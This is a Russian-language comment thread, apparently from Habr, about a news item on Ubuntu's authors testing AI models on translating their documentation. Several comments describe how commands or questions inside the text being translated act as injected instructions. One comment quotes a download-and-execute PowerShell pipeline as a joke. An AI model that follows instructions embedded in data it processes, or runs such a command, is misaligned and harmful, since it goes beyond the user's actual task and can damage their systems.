runaway_llm16 янв в 09:34

GPT-5 отказался работать, Gemini назвал жалобу «необоснованной»: авторы Ubuntu протестировали ИИ на своей документации

1 мин

16K

Искусственный интеллектМашинное обучение *

Комментарии 16

leslie500 16 янв в 09:37

Без DeepSeek перечень не полный

DanTru 16 янв в 12:08

128к токенов, слишком мало для задачи + их технология внимания на определенных участках, без чтения всего текста, выдаст много ошибок (имхо)

Sinclear 18 янв в 07:43

Да в принципе должно хватить, по крайней мере в вопросах документации. Но да, не хватает еще мистраля да и многих других моделей

TerraV 16 янв в 10:03

Из неожиданного - перевод документации именно прикладного ПО - одна из сложных для LLM. За счет того, что текст, который надо переводить отравляет контекст. Условная строчка "Click on OK button to close the dialog" воспринимается как прямая команда AI куда-то там кликнуть. Точно так же отравлением контекста при задаче перевода являются изолированные вопросы. ИИшечка порой забивает на часть "переведи" и начинает отвечать. Пока так, имеем что имеем.

Vitrion 16 янв в 10:24

Проще говоря, вместо перевода начинает ловить текстовые инъекции, т.к. документация - вещь специфичная, где много команд. Получается помимо галлюцинаций, программистам надо ещё работать над "перехватом" выполнения инструкций ИИ.

BlackMokona 16 янв в 10:39

Скорее нужно ещё на этапе обучения, сделать разметку для обучающих данных где команды от пользователя будут специально выделены, чтобы ИИ мог уверенно отличать одно от другого

Kagvi13 16 янв в 13:29

Мне ChatGPT когда-то посоветовал использовать для целей разметки конструкцию:

```python title="[путь_и_имя_файла]"
[текст_файла]
```

Вместо python, соответственно, может быть sql, markdown, yaml, html, text, ...

Как и ChatGPT, так и другие ИИ, если их сообщение можно скопировать как markdown, используют при вставке кода конструкции, типа:

```json
[текст]
```

andy212 16 янв в 10:50

Кто-нибудь уже попробовал перевести текст про БД, с условным DROP DATABASEвнутри?

Kenya-West 16 янв в 11:09

Лол, это же буквально:

irm https://example.tld/script.ps1 | iex

- получается, так.

LinkToOS 16 янв в 12:11

Первая задача — перевести документацию с британского английского на американский. Claude Sonnet справился на 7 из 10, GPT-5 получил ноль баллов — просто отказался выполнять задачу без объяснения причин. Gemini работал медленно, а потом начал менять слова в обратную сторону.

LLM-у забыли объяснить, что британский английский и американский английский это разные языки?

GPT-5 получил ноль баллов — просто отказался выполнять задачу без объяснения причин.

Фильтр не пропустил объяснение.

kostoms 16 янв в 22:04

и выложила все промпты и скрипты в открытый доступ.

Непонятно только одно - а зачем нам её неработающие промпты?

Spyman 16 янв в 22:10

Это исключительно правильное решение, нужное, чтобы гениальный промпт инжинеры (от которых последнее время очень много статей) - либо пришли и сказали "вот тут надо исправить и тогда заработает" и показали этим свою реальную гениальность, либо не смогли сослаться на "вы всё врети, просто промпт у вас кривой", что частенько бывает аргументом в дискуссии.